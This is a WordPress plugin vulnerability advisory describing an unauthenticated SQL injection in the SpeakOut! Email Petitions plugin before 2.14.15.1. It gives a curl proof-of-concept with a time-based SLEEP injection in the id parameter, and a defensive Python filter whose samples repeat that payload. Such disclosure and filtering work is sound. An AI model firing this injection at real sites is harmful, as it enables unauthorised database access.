WordPress Plugin Vulnerabilities
SpeakOut! Email Petitions < 2.14.15.1 - Unauthenticated SQLi
Description
The plugin does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL injection exploitable by unauthenticated users.
Proof of Concept
Create a new email petition (/wp-admin/admin.php?page=dk_speakout_addnew), check [x] Do not send email (only collect signatures), enter a title and hit save. Then, as an unauthenticated user, run:

curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=dk_speakout_sendmail&id=11 AND (SELECT 5023 FROM (SELECT(SLEEP(5)))Fvrh)-- VoFu'
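A request-side check that can sit in front of admin-ajax.php until the site runs 2.14.15.1 or later, shown as an added example (not the plugin's code and not part of the original advisory). It assumes the filter sees the URL-encoded POST body and that a legitimate petition id is a plain decimal integer; the function names and sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

ACTION = "dk_speakout_sendmail"           # AJAX action named in the advisory
STRICT_ID = re.compile(r"[0-9]{1,10}")    # assumption: ids are plain integers


def check_ajax_body(body: str) -> str:
    """Classify one admin-ajax.php POST body: 'ignore', 'allow' or 'block'."""
    params = parse_qs(body, keep_blank_values=True)
    if ACTION not in params.get("action", []):
        return "ignore"                   # some other AJAX action
    ids = params.get("id", [])
    # Require exactly one id made only of ASCII digits. Repeated ids are
    # blocked too, because the filter and PHP could disagree on which wins.
    if len(ids) == 1 and STRICT_ID.fullmatch(ids[0]):
        return "allow"
    return "block"


# Constructed sample bodies (not captured traffic).
SAMPLES = [
    "action=dk_speakout_sendmail&id=11",
    # The advisory's proof-of-concept value, as curl --data sends it.
    "action=dk_speakout_sendmail&id=11 AND (SELECT 5023 FROM "
    "(SELECT(SLEEP(5)))Fvrh)-- VoFu",
    # The same value percent-encoded, as a browser or library would send it.
    "action=dk_speakout_sendmail&id=11%20AND%20%28SELECT%205023%20FROM%20"
    "%28SELECT%28SLEEP%285%29%29%29Fvrh%29--%20VoFu",
    "action=dk_speakout_sendmail&id=11&id=12",   # duplicated parameter
    "action=dk_speakout_sendmail",               # id missing
    "action=heartbeat&id=abc",                   # unrelated action
]


def classify_samples():
    return [check_ajax_body(b) for b in SAMPLES]


if __name__ == "__main__":
    for body, verdict in zip(SAMPLES, classify_samples()):
        print(f"{verdict:6}  {body[:60]}")
```

A filter like this only narrows exposure; the actual fix is updating the plugin so the id is validated and bound server-side.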
Classification
Type
SQLI
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Verified
Yes
Timeline
Publicly Published
2022-03-07 (about 2 years ago)
Added
2022-03-07 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)